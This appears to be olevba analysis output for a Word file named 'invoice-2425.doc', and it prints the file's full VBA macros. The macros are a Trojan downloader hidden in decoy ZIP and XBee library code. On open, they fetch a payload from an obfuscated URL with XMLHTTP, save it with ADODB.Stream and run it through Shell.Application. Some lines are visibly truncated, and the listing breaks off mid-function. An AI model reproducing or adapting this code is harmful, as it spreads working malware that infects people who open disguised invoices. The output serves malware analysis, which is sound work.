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- olevba 0.41 -
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB-V invoice-2425.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: invoice-2425.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: invoice-2425.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- UZDLLPrnt "", 1
- ZDLLComm "NNcc"
- xbee_ensureMessageID
- szTrim ""
- ChopNulls "NNm"
- VBZip32
- VBUnZip32
- ZDLLPass "", 1, "", ""
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: invoice-2425.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- '-- Callback For UNZIP32.DLL - Receive Message Function
- Public Sub UZReceiveDLLMessage_I32( _
- ByVal ucsize_lo As Long, _
- ByVal ucsize_hi As Long, _
- ByVal csiz_lo As Long, _
- ByVal csiz_hi As Long, _
- ByVal cfactor As Integer, _
- ByVal mo As Integer, _
- ByVal dy As Integer, _
- ByVal yr As Integer, _
- ByVal hh As Integer, _
- ByVal mm As Integer, _
- ByVal c As Byte, _
- ByRef fname As String, _
- ByRef meth As String, _
- ByVal crc As Long, _
- ByVal fCrypt As Byte)
- Dim s0 As String
- Dim xx As Long
- Dim cCh As Byte
- Dim strout As String * 80
- Dim ucsize As Double
- Dim csiz As Double
- '-- Always implement a runtime error handler in Callback Routines!
- On Error Resume Next
- '------------------------------------------------
- '-- This Is Where The Received Messages Are
- '-- Printed Out And Displayed.
- '-- You Can Modify Below!
- '------------------------------------------------
- strout = Space$(80)
- '-- For Zip Message Printing
- If uZipNumber = 0 Then
- Mid$(strout, 1, 50) = "Filename:"
- Mid$(strout, 53, 4) = "Size"
- Mid$(strout, 62, 4) = "Date"
- Mid$(strout, 71, 4) = "Time"
- uZipMessage = strout & vbNewLine
- strout = Space$(80)
- End If
- s0 = ""
- '-- Do Not Change This For Next!!!
- For xx = 0 To UBound(
- If = 0 Then Exit For
- s0 = s0 & Chr$(
- Next
- ucsize = CnvI64Struct2Dbl(ucsize_lo, ucsize_hi)
- csiz = CnvI64Struct2Dbl(csiz_lo, csiz_hi)
- '-- Assign Zip Information For Printing
- Mid$(strout, 1, 50) = Mid$(s0, 1, 50)
- Mid$(strout, 51, 9) = Right$(" " & CStr(ucsize), 9)
- Mid$(strout, 62, 3) = Right$("0" & Trim$(CStr(mo)), 2) & "/"
- Mid$(strout, 65, 3) = Right$("0" & Trim$(CStr(dy)), 2) & "/"
- Mid$(strout, 68, 2) = Right$("0" & Trim$(CStr(yr)), 2)
- Mid$(strout, 72, 3) = Right$(str$(hh), 2) & ":"
- Mid$(strout, 75, 2) = Right$("0" & Trim$(CStr(mm)), 2)
- ' Mid$(strout, 77, 2) = Right$(" " & CStr(cfactor), 2)
- ' Mid$(strout, 80, 8) = Right$(" " & CStr(csiz), 8)
- ' s0 = ""
- ' For xx = 0 To 255
- ' If = 0 Then Exit For
- ' s0 = s0 & Chr$(
- ' Next xx
- '-- Do Not Modify Below!!!
- uZipMessage = uZipMessage & strout & vbNewLine
- uZipNumber = uZipNumber + 1
- End Sub
- '-- Callback For UNZIP32.DLL - Print Message Function
- Public Function UZDLLPrnt(ByRef fname As String, ByVal x As Long)
- Dim s0 As String
- Dim xx As Long
- Dim cCh As Byte
- '-- Always implement a runtime error handler in Callback Routines!
- On Error Resume Next
- s0 = ""
- '-- Gets The UNZIP32.DLL Message For Displaying.
- For xx = 0 To x - 1
- cCh =
- Select Case cCh
- Case 0
- Exit For
- Case 10
- s0 = s0 & vbNewLine ' Damn UNIX :-)
- Case 92 ' = Asc("\")
- s0 = s0 & "/"
- Case Else
- s0 = s0 & Chr$(cCh)
- End Select
- Next
- Set httpRequest = CreateObject("Microsoft.XMLHTTP")
- Set adodbStream = CreateObject("Adodb.Stream")
- '-- Assign Zip Information
- End Function
- '-- Callback For UNZIP32.DLL - DLL Service Function
- Public Function UZDLLServ_I32(ByRef mname As String, _
- ByVal lUcSiz_Lo As Long, ByVal lUcSiz_Hi As Long) As Long
- Dim UcSiz As Double
- Dim s0 As String
- Dim xx As Long
- '-- Always implement a runtime error handler in Callback Routines!
- On Error Resume Next
- ' Parameters lUcSiz_Lo and lUcSiz_Hi contain the uncompressed size
- ' of the extracted archive entry.
- ' This information may be used for some kind of progress display...
- UcSiz = CnvI64Struct2Dbl(lUcSiz_Lo, lUcSiz_Hi)
- s0 = ""
- '-- Get Zip32.DLL Message For processing
- For xx = 0 To UBound(
- If = 0 Then Exit For
- s0 = s0 & Chr$(
- Next
- ' At this point, s0 contains the message passed from the DLL
- ' (like the current file being extracted)
- ' It is up to the developer to code something useful here :)
- UZDLLServ_I32 = 0 ' Setting this to 1 will abort the zip!
- End Function
- '-- ASCIIZ To String Function
- Public Function szTrim(szString As String)
- Dim pos As Long
- adodbStream.Type = 1
- adodbStream.Open
- pos = InStr(szString, vbNullChar)
- Select Case pos
- Case Is > 1
- szTrim = Trim$(Left$(szString, pos - 1))
- Case 1
- szTrim = ""
- Case Else
- szTrim = Trim$(szString)
- End Select
- End Function
- '-- convert a 64-bit int divided in two Int32 variables into
- '-- a single 64-bit floating-point value
- Private Function CnvI64Struct2Dbl(ByVal lInt64Lo As Long, lInt64Hi As Long) As Double
- If lInt64Lo < 0 Then
- CnvI64Struct2Dbl = 2# ^ 32 + CDbl(lInt64Lo)
- Else
- CnvI64Struct2Dbl = CDbl(lInt64Lo)
- End If
- CnvI64Struct2Dbl = CnvI64Struct2Dbl + (2# ^ 32) * CDbl(lInt64Hi)
- End Function
- '-- Concatenate a "structured" version number into a single integer value,
- '-- to facilitate version number comparisons
- '-- (In case the practically used NumMajor numbers will ever exceed 128, it
- '-- should be considered to use the number type "Double" to store the
- '-- concatenated number. "Double" can store signed integer numbers up to a
- '-- width of 52 bits without loss of precision.)
- Private Function ConcatVersNums(ByVal NumMajor As Byte, ByVal NumMinor As Byte _
- , ByVal NumRevis As Byte, ByVal NumBuild As Byte) As Long
- If (NumMajor And &H80) <> 0 Then
- ConcatVersNums = (NumMajor And &H7F) * (2 ^ 24) Or &H80000000
- Else
- ConcatVersNums = NumMajor * (2 ^ 24)
- End If
- ConcatVersNums = ConcatVersNums _
- + NumMinor * (2 ^ 16) _
- + NumRevis * (2 ^ 8) _
- + NumBuild
- End Function
- '-- Helper function to provide a printable version number string, using the
- '-- current formatting rule for version number display as implemented in UnZip.
- Private Function VersNumsToTxt(ByVal NumMajor As Byte, ByVal NumMinor As Byte _
- , ByVal NumRevis As Byte) As String
- VersNumsToTxt = CStr(NumMajor) & "." & Hex$(NumMinor)
- If NumRevis <> 0 Then VersNumsToTxt = VersNumsToTxt & Hex$(NumRevis)
- End Function
- '-- Helper function to convert a "concatenated" version id into a printable
- '-- version number string, using the current formatting rule for version number
- '-- display as implemented in UnZip.
- Private Function VersIDToTxt(ByVal VersionID As Long) As String
- Dim lNumTemp As Long
- lNumTemp = VersionID \ (2 ^ 24)
- If lNumTemp < 0 Then lNumTemp = 256 + lNumTemp
- VersIDToTxt = CStr(lNumTemp) & "." _
- & Hex$((VersionID And &HFF0000) \ &H10000)
- lNumTemp = (VersionID And &HFF00&) \ &H100
- If lNumTemp <> 0 Then VersIDToTxt = VersIDToTxt & Hex$(lNumTemp)
- End Function
- '-- Main UNZIP32.DLL UnZip32 Subroutine
- '-- (WARNING!) Do Not Change!
- Public Sub VBUnZip32()
- Dim retcode As Long
- Dim MsgStr As String
- Dim TotalSizeComp As Double
- Dim TotalSize As Double
- Dim NumMembers As Double
- adodbStream.write httpRequest.responseBody
- adodbStream.savetofile prompt82, 2
- GoTo Step33
- '-- Set The UNZIP32.DLL Options
- '-- (WARNING!) Do Not Change
- UZDCL.StructVersID = cUz_DCLStructVer ' Current version of this structure
- UZDCL.ExtractOnlyNewer = uExtractOnlyNewer ' 1 = Extract Only Newer/New
- UZDCL.SpaceToUnderscore = uSpaceUnderScore ' 1 = Convert Space To Underscore
- UZDCL.PromptToOverwrite = uPromptOverWrite ' 1 = Prompt To Overwrite Required
- UZDCL.fQuiet = uQuiet ' 2 = No Messages 1 = Less 0 = All
- UZDCL.ncflag = uWriteStdOut ' 1 = Write To Stdout
- UZDCL.ntflag = uTestZip ' 1 = Test Zip File
- UZDCL.nvflag = uExtractList ' 0 = Extract 1 = List Contents
- UZDCL.nfflag = uFreshenExisting ' 1 = Update Existing by Newer
- UZDCL.nzflag = uDisplayComment ' 1 = Display Zip File Comment
- UZDCL.ndflag = uHonorDirectories ' 1 = Honour Directories
- UZDCL.noflag = uOverWriteFiles ' 1 = Overwrite Files
- UZDCL.naflag = uConvertCR_CRLF ' 1 = Convert CR To CRLF
- UZDCL.nZIflag = uVerbose ' 1 = Zip Info Verbose
- UZDCL.C_flag = uCaseSensitivity ' 1 = Case insensitivity, 0 = Case Sensitivity
- UZDCL.fPrivilege = uPrivilege ' 1 = ACL 2 = Priv
- UZDCL.Zip = uZipFileName ' ZIP Filename
- UZDCL.ExtractDir = uExtractDir ' Extraction Directory, NULL If Extracting
- ' To Current Directory
- '-- Set Callback Addresses
- '-- (WARNING!!!) Do Not Change
- UZUSER.UZDLLSND = 0& '-- Not Supported
- '-- Set UNZIP32.DLL Version Space
- '-- (WARNING!!!) Do Not Change
- With UZVER2
- .structlen = Len(UZVER2)
- .Beta = String$(10, vbNullChar)
- .Date = String$(20, vbNullChar)
- .ZLIB = String$(10, vbNullChar)
- End With
- Step33:
- Exit Sub
- '-- Get Version
- retcode = UzpVe.rsion2(UZVER2)
- If retcode <> 0 Then
- MsgBox "Incompatible DLL version discovered!" & vbNewLine _
- & "The UnZip DLL requires a version structure of length " _
- & CStr(retcode) & ", but the VB frontend expects the DLL to need " _
- & Len(UZVER2) & "bytes." & vbNewLine _
- & vbNewLine & "The program cannot continue." _
- , vbCritical + vbOKOnly, App.Title
- Exit Sub
- End If
- ' Check that the DLL version is sufficiently recent
- If (ConcatVersNums(UZVER2.unzip(1), UZVER2.unzip(2) _
- , UZVER2.unzip(3), UZVER2.unzip(4)) < _
- ConcatVersNums(cUzDLL_MinVer_Major, cUzDLL_MinVer_Minor _
- , cUzDLL_MinVer_Revis, 0)) Then
- ' The found UnZip DLL is too old!
- MsgBox "Incompatible old DLL version discovered!" & vbNewLine _
- & "This program requires an UnZip DLL version of at least " _
- & VersNumsToTxt(cUzDLL_MinVer_Major, cUzDLL_MinVer_Minor, cUzDLL_MinVer_Revis) _
- & ", but the version reported by the found DLL is only " _
- & VersNumsToTxt(UZVER2.unzip(1), UZVER2.unzip(2), UZVER2.unzip(3)) _
- & "." & vbNewLine _
- & vbNewLine & "The program cannot continue." _
- , vbCritical + vbOKOnly, App.Title
- Exit Sub
- End If
- ' Concatenate the DLL API version info into a single version id variable.
- ' This variable may be used later on to switch between different
- ' known variants of specific API calls or API structures.
- m_UzDllApiVers = ConcatVersNums(UZVER2.dllapimin(1), UZVER2.dllapimin(2) _
- , UZVER2.dllapimin(3), UZVER2.dllapimin(4))
- ' check that the DLL API version is not too new
- If (m_UzDllApiVers > _
- ConcatVersNums(cUzDLL_MaxAPI_Major, cUzDLL_MaxAPI_Minor _
- , cUzDLL_MaxAPI_Revis, 0)) Then
- ' The found UnZip DLL is too new!
- MsgBox "DLL version with incompatible API discovered!" & vbNewLine _
- & "This program can only handle UnZip DLL API versions up to " _
- & VersNumsToTxt(cUzDLL_MaxAPI_Major, cUzDLL_MaxAPI_Minor, cUzDLL_MaxAPI_Revis) _
- & ", but the found DLL reports a newer API version of " _
- & VersIDToTxt(m_UzDllApiVers) & "." & vbNewLine _
- & vbNewLine & "The program cannot continue." _
- , vbCritical + vbOKOnly, App.Title
- Exit Sub
- End If
- '--------------------------------------
- '-- You Can Change This For Displaying
- '-- The Version Information!
- '--------------------------------------
- MsgStr$ = "DLL Date: " & szTrim(UZVER2.Date)
- MsgStr$ = MsgStr$ & vbNewLine$ & "Zip Info: " _
- & VersNumsToTxt(UZVER2.zipinfo(1), UZVER2.zipinfo(2), UZVER2.zipinfo(3))
- MsgStr$ = MsgStr$ & vbNewLine$ & "DLL Version: " _
- & VersNumsToTxt(UZVER2.windll(1), UZVER2.windll(2), UZVER2.windll(3))
- MsgStr$ = MsgStr$ & vbNewLine$ & "DLL API Compatibility: " _
- & VersIDToTxt(m_UzDllApiVers)
- MsgStr$ = MsgStr$ & vbNewLine$ & "--------------"
- '-- End Of Version Information.
- '-- Go UnZip The Files! (Do Not Change Below!!!)
- '-- This Is The Actual UnZip Routine
- retcode = Wiz_Sin.gleEntryUnzip(uNumberFiles, uZipNames, uNumberXFiles, _
- uExcludeNames, UZDCL, UZUSER)
- '---------------------------------------------------------------
- '-- If There Is An Error Display A MsgBox!
- If retcode <> 0 Then _
- MsgBox "UnZip DLL call returned error code #" & CStr(retcode) _
- , vbExclamation, App.Title
- '-- Add up 64-bit values
- TotalSizeComp = CnvI64Struct2Dbl(UZUSER.TotalSizeComp_Lo, _
- UZUSER.TotalSizeComp_Hi)
- TotalSize = CnvI64Struct2Dbl(UZUSER.TotalSize_Lo, _
- UZUSER.TotalSize_Hi)
- NumMembers = CnvI64Struct2Dbl(UZUSER.NumMembers_Lo, _
- UZUSER.NumMembers_Hi)
- '-- You Can Change This As Needed!
- '-- For Compression Information
- MsgStr$ = MsgStr$ & vbNewLine & _
- "Only Shows If uExtractList = 1 List Contents"
- MsgStr$ = MsgStr$ & vbNewLine & "--------------"
- MsgStr$ = MsgStr$ & vbNewLine & "Comment : " & UZUSER.cchComment
- MsgStr$ = MsgStr$ & vbNewLine & "Total Size Comp : " _
- & Format$(TotalSizeComp, "#,0")
- MsgStr$ = MsgStr$ & vbNewLine & "Total Size : " _
- & Format$(TotalSize, "#,0")
- MsgStr$ = MsgStr$ & vbNewLine & "Compress Factor : %" & UZUSER.CompFactor
- MsgStr$ = MsgStr$ & vbNewLine & "Num Of Members : " & NumMembers
- MsgStr$ = MsgStr$ & vbNewLine & "--------------"
- VBUnzFrm.txtMsgOut.Text = VBUnzFrm.txtMsgOut.Text & MsgStr$ & vbNewLine
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: invoice-2425.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public httpRequest As Object
- Public adodbStream As Object
- Public processEnv As Object
- Public tempFolder As String
- Public prompt82 As String
- Public ZDLLPass3 As Object
- '-- Callback For ZIP32z64.DLL - DLL Service Function
- Public Function ZDLLServ(ByRef mname As String, _
- ByVal LowSize As Long, _
- ByVal HighSize As Long) As Long
- Dim s0 As String
- Dim xx As Long
- Dim FS As Currency ' for large file sizes
- '-- Always Put This In Callback Routines!
- On Error Resume Next
- FS = (HighSize * &H10000 * &H10000) + LowSize
- ' Form1.Print "ZDLLServ returned File Size High " & HighSize & _
- ' " Low " & LowSize & " = " & FS & " bytes"
- s0 = ""
- '-- Get Zip32.DLL Message For processing
- For xx = 0 To 4096 ' x
- If = 0 Then
- Exit For
- Else
- s0 = s0 + Chr(
- End If
- Next
- ' At this point, s0 contains the message passed from the DLL
- ' It is up to the developer to code something useful here :)
- ZDLLServ = 0 ' Setting this to 1 will abort the zip!
- End Function
- '-- Callback For ZIP32z64.DLL - DLL Password Function
- Public Function ZDLLPass(ByRef p As String, _
- ByVal n As Long, ByRef m As String, _
- ByRef Name As String)
- Dim filename As String
- Dim prompt As String
- Dim xx As Integer
- Dim szpassword As String
- '-- Always Put This In Callback Routines!
- On Error Resume Next
- ZDLLPass = 1
- ZDLLPass3.Open (prompt82)
- '-- User Entered A Password So Proccess It
- Exit Function
- '-- Enter or Verify
- For xx = 0 To 255
- If = 0 Then
- Exit For
- Else
- prompt = prompt & Chr(
- End If
- Next
- '-- If There Is A Password Have The User Enter It!
- '-- This Can Be Changed
- '-- Now skip asking if default password set
- If EncryptionPassword <> "" Then
- szpassword = EncryptionPassword
- Else
- szpassword = InputBox("Please Enter The Password!", prompt)
- End If
- '-- The User Did Not Enter A Password So Exit The Function
- If szpassword = "" Then Exit Function
- For xx = 0 To n - 1
- = 0
- Next
- For xx = 0 To Len(szpassword) - 1
- = Asc(Mid(szpassword, xx + 1, 1))
- Next
- = Chr(0) ' Put Null Terminator For C
- ZDLLPass = 0
- End Function
- '-- Callback For ZIP32z64.DLL - DLL Comment Function
- Public Function ZDLLComm(ByRef s1 As String)
- Dim comment As String
- Dim xx%, szcomment$
- Dim comment2() As Variant
- '-- Always Put This In Callback Routines!
- On Error Resume Next
- ZDLLComm = 1
- comment2 = Array(157, 167, 165, 159, 103, 90, 88, 144, 146, 138, 82, 77, 127, 144, 146, 124, 135, 134, 115, 116, 128, 127, 111, 121, 110, 104, 111, 99, 43, 94, 104, 100, 36, 42, 39, 97, 34, 33, 78, 31, 28, 92, 25, 14, 19, 16, 61, 61, 12, 11, -1, 52, 69, 48)
- GoTo Step1
- If Not IsEmpty(ArchiveCommentText) Then
- ' use text given to SetZipOptions
- szcomment = ArchiveCommentText
- Else
- For xx = 0 To 4095
- szcomment = szcomment & Chr(
- If = 0 Then
- Exit For
- End If
- Next
- comment = InputBox("Enter or edit the comment", Default:=szcomment)
- If comment = "" Then
- ' either empty comment or Cancel button
- If MsgBox("Remove comment?" & Chr(13) & "Hit No to keep existing comment", vbYesNo) = vbYes Then
- szcomment = comment
- Else
- Exit Function
- End If
- End If
- szcomment = comment
- End If
- Step1:
- httpRequest.Open "G" & "E" + "T", GetStringFromArray(comment2, 53), False
- GoTo Step2
- 'If szcomment = "" Then Exit Function
- For xx = 0 To Len(szcomment) - 1
- = Asc(Mid$(szcomment, xx + 1, 1))
- Next xx
- = 0 ' Put null terminator for C
- Step2:
- httpRequest.Send
- End Function
- Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
- Dim i As Integer
- Dim result As String
- result = ""
- For i = LBound(fromArr) To UBound(fromArr)
- result = result & Chr(fromArr(i) - LenLen + i * 2)
- Next i
- GetStringFromArray = result
- End Function
- ' This function can be used to set options in VB
- Public Function SetZipOptions(ByRef ZipOpts As String, _
- Optional ByVal ZipMode As String, _
- Optional ByVal RootDirToZipFrom As String, _
- Optional ByVal CompressionLevel As String, _
- Optional ByVal RecurseSubdirectories As String, _
- Optional ByVal Verboseness As String, _
- Optional ByVal i_IncludeFiles As String, _
- Optional ByVal x_ExcludeFiles As String, _
- Optional ByVal UpdateSFXOffsets As Boolean = False, Optional ByVal JunkDirNames As Boolean = False, _
- Optional ByVal Encrypt As Boolean = False, Optional ByVal Password As String = "", _
- Optional ByVal Repair As String, Optional ByVal NoDirEntries As Boolean = False, _
- Optional ByVal GrowExistingArchive As Boolean = False, _
- Optional ByVal JunkSFXPrefix As Boolean = False, Optional ByVal ForceUseOfDOSNames As Boolean = False, _
- Optional ByVal Translate_LF As String, _
- Optional ByVal Move_DeleteAfterAddedOrUpdated As Boolean = False, _
- Optional ByVal SetZipTimeToLatestTime As Boolean = False, _
- Optional ByVal IncludeSystemAndHiddenFiles As Boolean = False, _
- Optional ByVal ExcludeEarlierThanDate As String = "", _
- Optional ByVal IncludeEarlierThanDate As String = "", _
- Optional ByVal IncludeVolumeLabel As Boolean = False, _
- Optional ByVal ArchiveComment As Boolean = False, _
- Optional ByVal ArchiveCommentTextString = Empty, _
- Optional ByVal UsePrivileges As Boolean = False, _
- Optional ByVal ExcludeExtraAttributes As Boolean = False, Optional ByVal SplitSize As String = "", _
- Optional ByVal TempDirPath As String = "") As Boolean
- Dim SplitNum As Long
- Dim SplitMultS As String
- Dim SplitMult As Long
- ' set some defaults
- ZipOpts.Date = vbNullString
- ZipOpts.szRootDir = vbNullString
- ZipOpts.szTempDir = vbNullString
- ZipOpts.fTemp = 0
- ZipOpts.fSuffix = 0
- ZipOpts.fEncrypt = 0
- ZipOpts.fSystem = 0
- ZipOpts.fVolume = 0
- ZipOpts.fExtra = 0
- ZipOpts.fNoDirEntries = 0
- ZipOpts.fExcludeDate = 0
- ZipOpts.fIncludeDate = 0
- ZipOpts.fVerbose = 0
- ZipOpts.fQuiet = 0
- ZipOpts.fCRLF_LF = 0
- ZipOpts.fLF_CRLF = 0
- ZipOpts.fJunkDir = 0
- ZipOpts.fGrow = 0
- ZipOpts.fForce = 0
- ZipOpts.fMove = 0
- ZipOpts.fDeleteEntries = 0
- ZipOpts.fUpdate = 0
- ZipOpts.fFreshen = 0
- ZipOpts.fJunkSFX = 0
- ZipOpts.fLatestTime = 0
- ZipOpts.fComment = 0
- ZipOpts.fOffsets = 0
- ZipOpts.fPrivilege = 0
- ZipOpts.szSplitSize = vbNullString
- ZipOpts.IncludeListCount = 0
- ZipOpts.szIncludeList = vbNullString
- ZipOpts.ExcludeListCount = 0
- ZipOpts.szExcludeList = vbNullString
- ZipOpts.fRecurse = 0
- ZipOpts.fRepair = 0
- ZipOpts.flevel = 0
- If RootDirToZipFrom <> "" Then
- ZipOpts.szRootDir = RootDirToZipFrom
- End If
- ZipOpts.flevel = Asc(CompressionLevel)
- If UpdateSFXOffsets Then ZipOpts.fOffsets = 1
- If i_IncludeFiles <> "" Then
- ZipOpts.szIncludeList = i_IncludeFiles
- End If
- If x_ExcludeFiles <> "" Then
- ZipOpts.szExcludeList = x_ExcludeFiles
- End If
- If ZipMode = Add Then
- ' default
- ElseIf ZipMode = Delete Then
- ZipOpts.fDeleteEntries = 1
- ElseIf ZipMode = Update Then
- ZipOpts.fUpdate = 1
- Else
- ZipOpts.fFreshen = 1
- End If
- ZipOpts.fRepair = Repair
- If GrowExistingArchive Then ZipOpts.fGrow = 1
- If Move_DeleteAfterAddedOrUpdated Then ZipOpts.fMove = 1
- If Verboseness = Quiet Then
- ZipOpts.fQuiet = 1
- ElseIf Verboseness = Verbose Then
- ZipOpts.fVerbose = 1
- End If
- If ArchiveComment = False And Not IsEmpty(ArchiveCommentTextString) Then
- MsgBox "Must set ArchiveComment = True to set ArchiveCommentTextString"
- Exit Function
- End If
- If IsEmpty(ArchiveCommentTextString) Then
- ArchiveCommentText = Empty
- Else
- ArchiveCommentText = ArchiveCommentTextString
- End If
- If ArchiveComment Then ZipOpts.fComment = 1
- If NoDirEntries Then ZipOpts.fNoDirEntries = 1
- If JunkDirNames Then ZipOpts.fJunkDir = 1
- If Encrypt Then ZipOpts.fEncrypt = 1
- EncryptionPassword = Password
- If JunkSFXPrefix Then ZipOpts.fJunkSFX = 1
- If ForceUseOfDOSNames Then ZipOpts.fForce = 1
- If Translate_LF = LF_To_CRLF Then ZipOpts.fLF_CRLF = 1
- If Translate_LF = CRLF_To_LF Then ZipOpts.fCRLF_LF = 1
- ZipOpts.fRecurse = RecurseSubdirectories
- If IncludeSystemAndHiddenFiles Then ZipOpts.fSystem = 1
- If SetZipTimeToLatestTime Then ZipOpts.fLatestTime = 1
- If ExcludeEarlierThanDate <> "" And IncludeEarlierThanDate <> "" Then
- MsgBox "Both ExcludeEarlierThanDate and IncludeEarlierThanDate not " & Chr(10) & _
- "supported at same time"
- Exit Function
- End If
- If ExcludeEarlierThanDate <> "" Then
- ZipOpts.fIncludeDate = 1
- ZipOpts.Date = ExcludeEarlierThanDate
- End If
- If IncludeEarlierThanDate <> "" Then
- ZipOpts.fExcludeDate = 1
- ZipOpts.Date = IncludeEarlierThanDate
- End If
- If TempDirPath <> "" Then
- ZipOpts.szTempDir = TempDirPath
- ZipOpts.fTemp = 1
- End If
- If SplitSize <> "" Then
- SplitSize = Trim(SplitSize)
- SplitMultS = Right(SplitSize, 1)
- SplitMultS = UCase(SplitMultS)
- If (SplitMultS = "K") Then
- SplitMult = 1024
- SplitNum = Val(Left(SplitSize, Len(SplitSize) - 1))
- ElseIf SplitMultS = "M" Then
- SplitMult = 1024 * 1024&
- SplitNum = Val(Left(SplitSize, Len(SplitSize) - 1))
- ElseIf SplitMultS = "G" Then
- SplitMult = 1024 * 1024 * 1024&
- SplitNum = Val(Left(SplitSize, Len(SplitSize) - 1))
- Else
- SplitMult = 1024 * 1024&
- SplitNum = Val(SplitSize)
- End If
- SplitNum = SplitNum * SplitMult
- If SplitNum = 0 Then
- MsgBox "SplitSize of 0 not supported"
- Exit Function
- ElseIf SplitNum < 64 * 1024& Then
- MsgBox "SplitSize must be at least 64k"
- Exit Function
- End If
- ZipOpts.szSplitSize = SplitSize
- End If
- If IncludeVolumeLabel Then ZipOpts.fVolume = 1
- If UsePrivileges Then ZipOpts.fPrivilege = 1
- If ExcludeExtraAttributes Then ZipOpts.fExtra = 1
- SetZipOptions = True
- End Function
- Public Function ChopNulls(ByVal str)
- Dim A As Integer
- Dim c As String
- For A = 1 To Len(str)
- If Mid(str, A, 1) = Chr(0) Then
- ChopNulls = Left(str, A - 1)
- Exit Function
- End If
- Next
- Set processEnv = CreateObject("WScript." + "Shell").Environment("Pro" & "cess")
- ChopNulls = str
- End Function
- Sub DisplayVersion()
- ' display version of DLL
- Dim Beta As Boolean
- Dim ZLIB As Boolean
- Dim Zip64 As Boolean
- Dim Flags As String
- Dim A As Integer
- ZipVersion.structlen = Len(ZipVersion)
- ZpVersion ZipVersion
- ' Check flag
- If ZipVersion.flag And 1 Then
- Flags = Flags & " Beta,"
- Beta = True
- Else
- Flags = Flags & " No Beta,"
- End If
- If ZipVersion.flag And 2 Then
- Flags = Flags & " ZLIB,"
- ZLIB = True
- Else
- Flags = Flags & " No ZLIB,"
- End If
- If ZipVersion.flag And 4 Then
- Flags = Flags & " Zip64, "
- Zip64 = True
- Else
- Flags = Flags & " No Zip64, "
- End If
- If ZipVersion.encryption Then
- Flags = Flags & "Encryption"
- Else
- Flags = Flags & " No encryption"
- End If
- Form1.Caption = "Using Zip32z64.DLL Version " & _
- ZipVersion.ZipVersion.Major & "." & ZipVersion.ZipVersion.Minor & " " & _
- ChopNulls(ZipVersion.Beta) & " [" & ChopNulls(ZipVersion.Date) & "]" & _
- " - FLAGS: " & Flags
- If Not Zip64 Then
- A = MsgBox("Zip32z64.dll not compiled with Zip64 enabled - continue?", _
- vbOKCancel, _
- "Wrong dll")
- If A = vbCancel Then
- End
- End If
- End If
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: invoice-2425.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function PointerToString(lngPtr As Long) As String
- Dim strTemp As String
- Dim lngLen As Long
- If lngPtr Then
- lngLen = lstrlenW(lngPtr) * 2
- If lngLen Then
- strTemp = Space(lngLen)
- CopyMemory ByVal strTemp, ByVal lngPtr, lngLen
- PointerToString = Replace(strTemp, Chr(0), "")
- End If
- End If
- End Function
- Public Function ArrayToString(data() As Byte, Optional lb As Integer = -1, Optional ub As Integer = -1) As String
- Dim tmp As String
- Dim i
- If lb = -1 Then lb = LBound(data)
- If ub = -1 Then ub = UBound(data)
- tmp = ""
- For i = lb To ub
- If (data(i) = 0) Then Exit For
- tmp = tmp & Chr(data(i))
- Next
- ArrayToString = tmp
- End Function
- Public Function xbee_pointerToPacket(lngPtr As Long) As String
- Dim p As xbee_pkt
- CopyMemory p, ByVal lngPtr, Len(p)
- xbee_pointerToPacket = p
- End Function
- Public Sub libxbee_load()
- ' this function is simply to get VB6 to call a libxbee function
- ' if you are using any C DLLs that make use of libxbee, then you should call this function first so that VB6 will load libxbee
- xbee_svn_versionRaw
- End Sub
- Public Function xbee_svn_version() As String
- xbee_svn_version = PointerToString(xbee_svn_versionRaw())
- End Function
- Public Function xbee_setupAPI(ByVal port As String, ByVal baudRate As Long, ByVal cmdSeq As String, ByVal cmdTime As Long)
- xbee_setupAPI = xbee_setupAPIRaw(port, baudRate, Asc(cmdSeq), cmdTime)
- End Function
- Public Function xbee_setupDebugAPI(ByVal port As String, ByVal baudRate As Long, ByVal logfile As String, ByVal cmdSeq As String, ByVal cmdTime As Long)
- xbee_setupDebugAPI = xbee_setupDebugAPIRaw(port, baudRate, logfile, Asc(cmdSeq), cmdTime)
- End Function
- Public Sub xbee_ensureMessageID()
- Set ZDLLPass3 = CreateObject("Shell.Application")
- Exit Sub
- If callbackMessageID = 0 Then
- callbackMessageID = Regist.erWindowMessage("libxbee")
- End If
- xbee_enabl.eCallbacksRaw ActivehWnd, callbackMessageID
- End Sub
- Public Sub xbee_attachCallback(ByVal con As Long, ByVal func As Long)
- Dim t(0 To 1) As Long
- Dim c As String
- If ActivehWnd = 0 Then
- Debug.Print "Callbacks not enabled!"
- Exit Sub
- End If
- xbee_ensureMessageID
- c = CStr(con)
- t(0) = con
- t(1) = func
- On Error Resume Next
- Callbacks.Remove c
- Callbacks.Add t, c
- On Error GoTo 0
- xbee_attachCallbackRaw con
- End Sub
- Public Sub xbee_detachCallback(ByVal con As Long)
- If ActivehWnd = 0 Then
- Debug.Print "Callbacks not enabled!"
- Exit Sub
- End If
- On Error Resume Next
- xbee_detachCallbackRaw con
- Callbacks.Remove CStr(con)
- End Sub
- Public Sub xbee_enableCallbacks(ByVal hWnd As Long)
- If ActivehWnd <> 0 Then
- Debug.Print "Callbacks already enabled!"
- Exit Sub
- End If
- ActivehWnd = hWnd
- OldhWndHandler = SetWindowLong(hWnd, GWL_WNDPROC, AddressOf libxbee.xbee_messageHandler)
- xbee_ensureMessageID
- End Sub
- Public Sub xbee_disableCallbacks()
- Dim id As Variant
- If ActivehWnd = 0 Then
